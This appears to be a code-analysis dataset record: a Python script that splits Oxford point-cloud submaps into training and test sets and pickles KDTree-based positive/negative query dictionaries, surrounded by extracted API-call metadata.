20146), False, 'from smarts.core.utils.sumo import sumolib\n'), ((31756, 31781), 'random.choice', 'random.choice', (['next_edges'], {}), '(next_edges)\n', (31769, 31781), False, 'import random\n'), ((46382, 46443), 'trimesh.exchange.gltf.export_glb', 'gltf.export_glb', (['scene'], {'extras': 'metadata', 'include_normals': '(True)'}), '(scene, extras=metadata, include_normals=True)\n', (46397, 46443), False, 'from trimesh.exchange import gltf\n'), ((55834, 55943), 'numpy.interp', 'np.interp', (['evenly_spaced_cumulative_path_dist', 'cumulative_path_dist', 'ref_lanepoints_coordinates[variable]'], {}), '(evenly_spaced_cumulative_path_dist, cumulative_path_dist,\n ref_lanepoints_coordinates[variable])\n', (55843, 55943), True, 'import numpy as np\n'), ((6137, 6169), 'os.path.isfile', 'os.path.isfile', (['shifted_net_file'], {}), '(shifted_net_file)\n', (6151, 6169), False, 'import os\n'), ((6322, 6378), 'smarts.core.utils.sumo.sumolib.net.readNet', 'sumolib.net.readNet', (['shifted_net_file'], {'withInternal': '(True)'}), '(shifted_net_file, withInternal=True)\n', (6341, 6378), False, 'from smarts.core.utils.sumo import sumolib\n'), ((15122, 15140), 'numpy.linalg.norm', 'np.linalg.norm', (['lv'], {}), '(lv)\n', (15136, 15140), True, 'import numpy as np\n'), ((19052, 19149), 'smarts.core.utils.sumo.sumolib.geomhelper.polygonOffsetWithMinimumDistanceToPoint', 'sumolib.geomhelper.polygonOffsetWithMinimumDistanceToPoint', (['point', 'shape'], {'perpendicular': '(False)'}), '(point, shape,\n perpendicular=False)\n', (19110, 19149), False, 'from smarts.core.utils.sumo import sumolib\n'), ((19520, 19571), 'smarts.core.utils.sumo.sumolib.geomhelper.distance', 'sumolib.geomhelper.distance', (['shape[i]', 'shape[i + 1]'], {}), '(shape[i], shape[i + 1])\n', (19547, 19571), False, 'from smarts.core.utils.sumo import sumolib\n'), ((36373, 36437), 'logging.warning', 'logging.warning', (['"""unable to find road on route near start point"""'], {}), "('unable to find road on route near start point')\n", (36388, 36437), False, 'import logging\n'), ((36797, 36859), 'logging.warning', 'logging.warning', (['"""unable to find road on route near end point"""'], {}), "('unable to find road on route near end point')\n", (36812, 36859), False, 'import logging\n'), ((38186, 38250), 'logging.warning', 'logging.warning', (['"""unable to find road on route near start point"""'], {}), "('unable to find road on route near start point')\n", (38201, 38250), False, 'import logging\n'), ((40150, 40163), 'shapely.geometry.Polygon', 'Polygon', (['line'], {}), '(line)\n', (40157, 40163), False, 'from shapely.geometry import Polygon\n'), ((41817, 41830), 'shapely.geometry.Point', 'shPoint', (['x', 'y'], {}), '(x, y)\n', (41824, 41830), True, 'from shapely.geometry import Point as shPoint\n'), ((43174, 43193), 'shapely.geometry.Polygon', 'Polygon', (['new_coords'], {}), '(new_coords)\n', (43181, 43193), False, 'from shapely.geometry import Polygon\n'), ((43995, 44008), 'shapely.geometry.Point', 'shPoint', (['x', 'y'], {}), '(x, y)\n', (44002, 44008), True, 'from shapely.geometry import Point as shPoint\n'), ((45510, 45529), 'shapely.geometry.Polygon', 'Polygon', (['new_coords'], {}), '(new_coords)\n', (45517, 45529), False, 'from shapely.geometry import Polygon\n'), ((46276, 46313), 'trimesh.visual.material.PBRMaterial', 'trimesh.visual.material.PBRMaterial', ([], {}), '()\n', (46311, 46313), False, 'import trimesh\n'), ((47682, 47733), 'numpy.array', 'np.array', (['[edge_borders[i][0], edge_borders[i][-1]]'], {}), '([edge_borders[i][0], edge_borders[i][-1]])\n', (47690, 47733), True, 'import numpy as np\n'), ((47830, 47881), 'numpy.array', 'np.array', (['[edge_borders[j][-1], edge_borders[j][0]]'], {}), '([edge_borders[j][-1], edge_borders[j][0]])\n', (47838, 47881), True, 'import numpy as np\n'), ((15232, 15251), 'numpy.dot', 'np.dot', (['my_vect', 'lv'], {}), '(my_vect, lv)\n', (15238, 15251), True, 'import numpy as np\n'), ((40937, 40985), 'shapely.ops.snap', 'snap', (['lane_shape', 'incoming_shape', 'snap_threshold'], {}), '(lane_shape, incoming_shape, snap_threshold)\n', (40941, 40985), False, 'from shapely.ops import nearest_points, snap\n'), ((41252, 41300), 'shapely.ops.snap', 'snap', (['lane_shape', 'outgoing_shape', 'snap_threshold'], {}), '(lane_shape, outgoing_shape, snap_threshold)\n', (41256, 41300), False, 'from shapely.ops import nearest_points, snap\n'), ((48118, 48163), 'numpy.linalg.norm', 'np.linalg.norm', (['(edge_border_i - edge_border_j)'], {}), '(edge_border_i - edge_border_j)\n', (48132, 48163), True, 'import numpy as np\n'), ((54956, 55021), 'numpy.ediff1d', 'np.ediff1d', (["ref_lanepoints_coordinates['positions_x']"], {'to_begin': '(0)'}), "(ref_lanepoints_coordinates['positions_x'], to_begin=0)\n", (54966, 55021), True, 'import numpy as np\n'), ((55045, 55110), 'numpy.ediff1d', 'np.ediff1d', (["ref_lanepoints_coordinates['positions_y']"], {'to_begin': '(0)'}), "(ref_lanepoints_coordinates['positions_y'], to_begin=0)\n", (55055, 55110), True, 'import numpy as np\n'), ((56792, 56900), 'numpy.array', 'np.array', (["[evenly_spaced_coordinates['positions_x'][idx], evenly_spaced_coordinates[\n 'positions_y'][idx]]"], {}), "([evenly_spaced_coordinates['positions_x'][idx],\n evenly_spaced_coordinates['positions_y'][idx]])\n", (56800, 56900), True, 'import numpy as np\n'), ((42421, 42448), 'shapely.ops.nearest_points', 'nearest_points', (['p', 'nl_shape'], {}), '(p, nl_shape)\n', (42435, 42448), False, 'from shapely.ops import nearest_points, snap\n'), ((44757, 44784), 'shapely.ops.nearest_points', 'nearest_points', (['p', 'nl_shape'], {}), '(p, nl_shape)\n', (44771, 44784), False, 'from shapely.ops import nearest_points, snap\n')]
|
import os
import pickle
import random
import numpy as np
import pandas as pd
from sklearn.neighbors import KDTree
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
base_path = cfg.DATASET_FOLDER
runs_folder = "oxford/"
filename = "pointcloud_locations_20m_10overlap.csv"
pointcloud_fols = "/pointcloud_20m_10overlap/"
all_folders = sorted(os.listdir(os.path.join(BASE_DIR,base_path,runs_folder)))
folders = []
# All runs are used for training (both full and partial)
index_list = range(len(all_folders)-1)
print("Number of runs: "+str(len(index_list)))
for index in index_list:
folders.append(all_folders[index])
print(folders)
#####For training and test data split#####
x_width = 150
y_width = 150
p1 = [5735712.768124,620084.402381]
p2 = [5735611.299219,620540.270327]
p3 = [5735237.358209,620543.094379]
p4 = [5734749.303802,619932.693364]
p = [p1,p2,p3,p4]
def check_in_test_set(northing, easting, points, x_width, y_width):
in_test_set = False
for point in points:
if(point[0]-x_width < northing and northing < point[0]+x_width and point[1]-y_width < easting and easting < point[1]+y_width):
in_test_set = True
break
return in_test_set
##########################################
def construct_query_dict(df_centroids, filename):
tree = KDTree(df_centroids[['northing','easting']])
ind_nn = tree.query_radius(df_centroids[['northing','easting']],r=10)
ind_r = tree.query_radius(df_centroids[['northing','easting']], r=50)
queries = {}
for i in range(len(ind_nn)):
query = df_centroids.iloc[i]["file"]
positives = np.setdiff1d(ind_nn[i],[i]).tolist()
negatives = np.setdiff1d(
df_centroids.index.values.tolist(),ind_r[i]).tolist()
random.shuffle(negatives)
queries[i] = {"query":query,
"positives":positives,"negatives":negatives}
with open(filename, 'wb') as handle:
pickle.dump(queries, handle, protocol=pickle.HIGHEST_PROTOCOL)
print("Done ", filename)
# Initialize pandas DataFrame
df_train = pd.DataFrame(columns=['file','northing','easting'])
df_test = pd.DataFrame(columns=['file','northing','easting'])
for folder in folders:
df_locations = pd.read_csv(os.path.join(
base_path,runs_folder,folder,filename),sep=',')
df_locations['timestamp'] = runs_folder+folder + \
pointcloud_fols+df_locations['timestamp'].astype(str)+'.bin'
df_locations = df_locations.rename(columns={'timestamp':'file'})
for index, row in df_locations.iterrows():
if(check_in_test_set(row['northing'], row['easting'], p, x_width, y_width)):
df_test = df_test.append(row, ignore_index=True)
else:
df_train = df_train.append(row, ignore_index=True)
print("Number of training submaps: "+str(len(df_train['file'])))
print("Number of non-disjoint test submaps: "+str(len(df_test['file'])))
construct_query_dict(df_train,"training_queries_baseline.pickle")
construct_query_dict(df_test,"test_queries_baseline.pickle")
|
[
"pandas.DataFrame",
"os.path.abspath",
"pickle.dump",
"os.path.join",
"random.shuffle",
"numpy.setdiff1d",
"sklearn.neighbors.KDTree"
] |
[((2077, 2130), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': "['file', 'northing', 'easting']"}), "(columns=['file', 'northing', 'easting'])\n", (2089, 2130), True, 'import pandas as pd\n'), ((2139, 2192), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': "['file', 'northing', 'easting']"}), "(columns=['file', 'northing', 'easting'])\n", (2151, 2192), True, 'import pandas as pd\n'), ((143, 168), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (158, 168), False, 'import os\n'), ((1308, 1353), 'sklearn.neighbors.KDTree', 'KDTree', (["df_centroids[['northing', 'easting']]"], {}), "(df_centroids[['northing', 'easting']])\n", (1314, 1353), False, 'from sklearn.neighbors import KDTree\n'), ((358, 404), 'os.path.join', 'os.path.join', (['BASE_DIR', 'base_path', 'runs_folder'], {}), '(BASE_DIR, base_path, runs_folder)\n', (370, 404), False, 'import os\n'), ((1761, 1786), 'random.shuffle', 'random.shuffle', (['negatives'], {}), '(negatives)\n', (1775, 1786), False, 'import random\n'), ((1941, 2003), 'pickle.dump', 'pickle.dump', (['queries', 'handle'], {'protocol': 'pickle.HIGHEST_PROTOCOL'}), '(queries, handle, protocol=pickle.HIGHEST_PROTOCOL)\n', (1952, 2003), False, 'import pickle\n'), ((2246, 2300), 'os.path.join', 'os.path.join', (['base_path', 'runs_folder', 'folder', 'filename'], {}), '(base_path, runs_folder, folder, filename)\n', (2258, 2300), False, 'import os\n'), ((1616, 1644), 'numpy.setdiff1d', 'np.setdiff1d', (['ind_nn[i]', '[i]'], {}), '(ind_nn[i], [i])\n', (1628, 1644), True, 'import numpy as np\n')]
|